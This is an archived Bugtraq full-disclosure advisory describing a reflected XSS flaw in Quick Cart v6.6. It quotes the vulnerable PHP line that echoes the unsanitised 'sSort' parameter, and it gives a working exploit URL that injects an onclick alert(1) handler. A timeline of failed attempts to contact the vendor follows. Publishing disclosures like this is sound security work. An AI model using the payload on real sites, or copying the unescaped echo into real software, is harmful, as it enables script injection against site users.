| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 19 Jan 2016 18:15:14 +0530 From: Rahul Pratap Singh <techno.rps@...il.com> To: bugtraq@...urityfocus.com Subject: Quick Cart v6.6 XSS Vulnerability ## FULL DISCLOSURE #Product : Quick Cart #Exploit Author : Rahul Pratap Singh #Version : 6.6 #Home page Link : http://opensolution.org/home.html #Website : 0x62626262.wordpress.com #Linkedin : https://in.linkedin.com/in/rahulpratapsingh94 #Date : 19/Jan/2016 XSS Vulnerability: ---------------------------------------- Description: ---------------------------------------- "sSort" parameter is not sanitized that leads to Reflected XSS. ---------------------------------------- Vulnerable Code: ---------------------------------------- File Name: products.php Found at line:26 <?php if( isset( $sSort ) ) echo '<input type="hidden" name="sSort" value="'.$sSort.'" />'; ?> ---------------------------------------- Exploit: ---------------------------------------- localhost/Quick.Cart_v6.6/admin.php?p=pages-list&sSort="%20onclick="alert(1)&sPhrase= ---------------------------------------- POC: ---------------------------------------- https://0x62626262.files.wordpress.com/2016/01/quick-cartv6-6xsspoc.png Disclosure Timeline: Tried to contact vendor via email : 14/1/2016 ( email bounce back) Tried to contact vendor via forum : 18/1/2016 (thread deleted, no response) Public Disclosure: 19/1/2016 Pub ref: https://0x62626262.wordpress.com/2016/01/19/quick-cart-v-6-6-xss-vulnerability Download attachment "0x9ACF7D5F.asc" of type "application/pgp-keys" (3134 bytes) Download attachment "signature.asc" of type "application/pgp-signature" (837 bytes)
Powered by blists - more mailing lists